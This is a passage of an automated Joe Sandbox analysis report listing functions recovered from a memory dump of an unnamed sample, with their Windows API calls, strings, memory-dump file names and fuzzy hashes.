AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AA7
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD4AB9
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AD2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4AE4
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B29
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B3E
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4B49

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 12665fa976eb1d471c95687576976a78d2b0f38c6b7c8e1b8ff87a04d6bf7ea6
Instruction ID: 20687d33c0a34b5d7072f8c9873591287daca9e051910a8dded9fa9d7190c648
Opcode Fuzzy Hash: 12665fa976eb1d471c95687576976a78d2b0f38c6b7c8e1b8ff87a04d6bf7ea6
Instruction Fuzzy Hash: 5A31D171204304AFDB159F66DC85BAA77ADAB50356F19841BFA04E7290C7B4ED488F20

Function 00E0EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00E0EC32
SendMessageW.USER32(?,00001328,00000000,?), ref: 00E0EC49
GetWindowDC.USER32(?), ref: 00E0EC55
GetPixel.GDI32(00000000,?,?), ref: 00E0EC64
ReleaseDC.USER32(?,00000000), ref: 00E0EC76
GetSysColor.USER32(00000005), ref: 00E0EC94

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 45c2ddf35ded7d2152e5fe642d1e92a6570bbb2bcd17bdf66a4a1eb02f544421
Instruction ID: a3d27d5b9f1ca6986a9838e48a5722c45cdaae19d05e7fe817b6b3d894ed32ab
Opcode Fuzzy Hash: 45c2ddf35ded7d2152e5fe642d1e92a6570bbb2bcd17bdf66a4a1eb02f544421
Instruction Fuzzy Hash: E0216D31504204FFEB21AF75EC48BE97B75EB05325F108625FA26B51E2DB310945DF21

Function 00DCD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00DCDD46), ref: 00DCDC86

Strings

REGEXPCLASS, xrefs: 00DCDA4C
CLASS, xrefs: 00DCDA06
CLASSNN, xrefs: 00DCDA29
TEXT, xrefs: 00DCDBBD
NAME, xrefs: 00DCDAB8
INSTANCE, xrefs: 00DCDB94

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 8fce18e9e159098e5e484321fa0dc8d91d2a4020a1136fd5e40be5f7d729eaf7
Instruction ID: f3c70a7f5701829b53a577d643bdeea68177821691c57b6434f89eca2888fb39
Opcode Fuzzy Hash: 8fce18e9e159098e5e484321fa0dc8d91d2a4020a1136fd5e40be5f7d729eaf7
Instruction Fuzzy Hash: B3919370900507AACB08DF64C882FE9FB76FF19340F58852DE99AA7151DB30A959CBB0

Function 00D945A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D945F0
CoUninitialize.COMBASE ref: 00D94695
UnregisterHotKey.USER32(?), ref: 00D947BD
DestroyWindow.USER32(?), ref: 00E05936
FreeLibrary.KERNEL32(?), ref: 00E0599D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E059CA

Strings

close all, xrefs: 00D945EB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 38333b13aa7ed17900124a64cd9ebb0cb12da90b598727209512c770f16780cb
Instruction ID: e35e7a4abe80f36aee027d1d8b89215638fac6e9f9cf72511e62f4aa29145286
Opcode Fuzzy Hash: 38333b13aa7ed17900124a64cd9ebb0cb12da90b598727209512c770f16780cb
Instruction Fuzzy Hash: 0F915B35601602DFCB19EF24C895EA9F3A4FF15304F5442A9E41AA72A2DB30AD5ACF70

Function 00DAC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00DAC2D2

Part of subcall function 00DAC697: GetClientRect.USER32(?,?), ref: 00DAC6C0
Part of subcall function 00DAC697: GetWindowRect.USER32(?,?), ref: 00DAC701
Part of subcall function 00DAC697: ScreenToClient.USER32(?,?), ref: 00DAC729

GetDC.USER32 ref: 00E0E006
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E0E019
SelectObject.GDI32(00000000,00000000), ref: 00E0E027
SelectObject.GDI32(00000000,00000000), ref: 00E0E03C
ReleaseDC.USER32(?,00000000), ref: 00E0E044
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E0E0CF

Strings

U, xrefs: 00E0DFA4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d165e19a860b162fd426cd5daed0bd4bf70e23935b5e9d18c092f05d7e023e71
Instruction ID: d36c542aa81b1aad4b20ddb42e56a8d5bfd6341197b88e61af4cb85225884676
Opcode Fuzzy Hash: d165e19a860b162fd426cd5daed0bd4bf70e23935b5e9d18c092f05d7e023e71
Instruction Fuzzy Hash: B071F331500209DFCF258FA4CC80AEA7BB5FF49324F18A675ED956A2E6C7318C85DB61

Function 00DE4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DE4C5E
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DE4C8A
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00DE4CCC
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DE4CE1
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE4CEE
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DE4D1E
InternetCloseHandle.WININET(00000000), ref: 00DE4D65

Part of subcall function 00DE56A9: GetLastError.KERNEL32(?,?,00DE4A2B,00000000,00000000,00000001), ref: 00DE56BE

Strings

, xrefs: 00DE4D17

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: f3f09ed55add0bda21decedd849c207796ec8c50385ce066d90ef73115e07ec7
Instruction ID: c0712da51fb74edc4cfbf70e89bc20c02fded49ac26c29b451d4b8e02b452d7f
Opcode Fuzzy Hash: f3f09ed55add0bda21decedd849c207796ec8c50385ce066d90ef73115e07ec7
Instruction Fuzzy Hash: 75416DB1501658BFEB12AF62CC89FFB77ACEF08354F14811AFA01AA195D774D9448BB0

Function 00DEBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E2DBF0), ref: 00DEBBA1
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E2DBF0), ref: 00DEBBD5
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DEBD33
SysFreeString.OLEAUT32(?), ref: 00DEBD5D
StringFromGUID2.COMBASE(?,?,00000028), ref: 00DEBEAD
ProgIDFromCLSID.COMBASE(?,?), ref: 00DEBEF7
CoTaskMemFree.COMBASE(?), ref: 00DEBF14

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
String ID:
API String ID: 793797124-0
Opcode ID: e1fa83137d7b77280d440a26ebf7bea780747e62560de3f96d669b93add8683a
Instruction ID: 6f01e8b7efbf084e7435ccbef41542a87f38fb0782e7f12ff38712fee0798e3d
Opcode Fuzzy Hash: e1fa83137d7b77280d440a26ebf7bea780747e62560de3f96d669b93add8683a
Instruction Fuzzy Hash: 72F10A75A00109EFCF14EFA5C884EAEB7B9FF89714F148499F905AB250DB31AE45CB60

Function 00DAB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D94954,00000000), ref: 00D94A23

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DAB85B), ref: 00DAB926
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DAB85B,00000000,?,?,00DAAF1E,?,?), ref: 00DAB9BD
DestroyAcceleratorTable.USER32(00000000), ref: 00E0E775
DeleteObject.GDI32(00000000), ref: 00E0E7EB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: c88f192753000532789bb0b224449b097d6774aa84ab8c2ccc91f7a8ece2dc56
Instruction ID: 98bf338e6a9716621ec6900333ebe24bc10dc389b20dca1ff6679f74f4bc092e
Opcode Fuzzy Hash: c88f192753000532789bb0b224449b097d6774aa84ab8c2ccc91f7a8ece2dc56
Instruction Fuzzy Hash: 6561C030100701CFDB399F26DC88B26B7F5FF46326F18492AE186666B1C771A896CF60

Function 00DFB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DFB204

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4d686521afed5b83252a23733f25b84a6a29d35d4e2850e0e20d994f0e8a0855
Instruction ID: 9bafec9c544ad5d558a0e7656379bb069613a4674934342e817592a48db256d1
Opcode Fuzzy Hash: 4d686521afed5b83252a23733f25b84a6a29d35d4e2850e0e20d994f0e8a0855
Instruction Fuzzy Hash: 3C51913054421CBEEB249F29CC85BBE3BA5EB06334F29C513FB55E61A1C771E9548A70

Function 00DAA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E0E9EA
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0EA0B
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E0EA20
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E0EA3D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E0EA64
DestroyCursor.USER32(00000000), ref: 00E0EA6F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E0EA8C
DestroyCursor.USER32(00000000), ref: 00E0EA97

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: 164583f449381d98f7ca293de05323094a7b8af8ec4f95f030337d290617de7d
Instruction ID: dfc4a0c9a77da2de13f352048ac86359ec39b31a90419dc8f31bb9c8bf6bca66
Opcode Fuzzy Hash: 164583f449381d98f7ca293de05323094a7b8af8ec4f95f030337d290617de7d
Instruction Fuzzy Hash: A3516870A00709AFDB24CF69CC81BAA7BB5FB49354F144A29F946A72D0D770EC84DB60

Function 00DAF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00DAF737
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00DAF77E
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00E0EB55
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E0E9A0,00000004,00000000,00000000), ref: 00E0EBC1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2787cc3761280fc33c5eba8361d08522d42483e38519e14aa8558dc3444f9f75
Instruction ID: b443b843c06b20373986b5c7c1eb910d8efc06d7726e2c18fa2e520f2b49b9c4
Opcode Fuzzy Hash: 2787cc3761280fc33c5eba8361d08522d42483e38519e14aa8558dc3444f9f75
Instruction Fuzzy Hash: D341EC302086809EDB395B798CC8B667B95AB47306F6C5CFDE087625A1C770E885DB31

Function 00DCCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCE158
Part of subcall function 00DCE138: GetCurrentThreadId.KERNEL32 ref: 00DCE15F
Part of subcall function 00DCE138: AttachThreadInput.USER32(00000000,?,00DCCDFB,?,00000001), ref: 00DCE166

MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE06
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DCCE23
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00DCCE26
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE2F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DCCE4D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DCCE50
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DCCE59
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DCCE70
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DCCE73

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 26b91f596700da0f45f48af3292886af95dcc9aaf76b982f5148e245b04b9f53
Instruction ID: d32e485886672e1557593cfc3356b4873ecebfdf4f5cc7aa48c393186c18c728
Opcode Fuzzy Hash: 26b91f596700da0f45f48af3292886af95dcc9aaf76b982f5148e245b04b9f53
Instruction Fuzzy Hash: 8D11C4B1650618BEF7106F658C8EFAA7B2DDB48764F500419F3457B0E0C9F2AC519AB4

Function 00DEC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00DCA857: CLSIDFromProgID.COMBASE ref: 00DCA874
Part of subcall function 00DCA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DCA88F
Part of subcall function 00DCA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00DCA89D
Part of subcall function 00DCA857: CoTaskMemFree.COMBASE(00000000), ref: 00DCA8AD

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DEC6AD
_memset.LIBCMT ref: 00DEC6BA
_memset.LIBCMT ref: 00DEC7D8
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00DEC804
CoTaskMemFree.COMBASE(?), ref: 00DEC80F

Strings

NULL Pointer assignment, xrefs: 00DEC85D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 28d8e97907f51162023a55a69e911d9999c15248742db1f4eb340d02be331075
Instruction ID: 9584fa9f01fd9c3154e30e4e2eeb78b061bf3b1af33b8c51d312d058b0e659cc
Opcode Fuzzy Hash: 28d8e97907f51162023a55a69e911d9999c15248742db1f4eb340d02be331075
Instruction Fuzzy Hash: 56911871D00219ABDB11EFA5DC81EDEBBB9EF08710F20412AF519A7291DB709A45CFB0

Function 00DF1AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DF1B09
Process32FirstW.KERNEL32(00000000,?), ref: 00DF1B17
__wsplitpath.LIBCMT ref: 00DF1B45

Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD

_wcscat.LIBCMT ref: 00DF1B5A
Process32NextW.KERNEL32(00000000,?), ref: 00DF1BD0
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DF1BE2

Strings

hE, xrefs: 00DF1AED

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

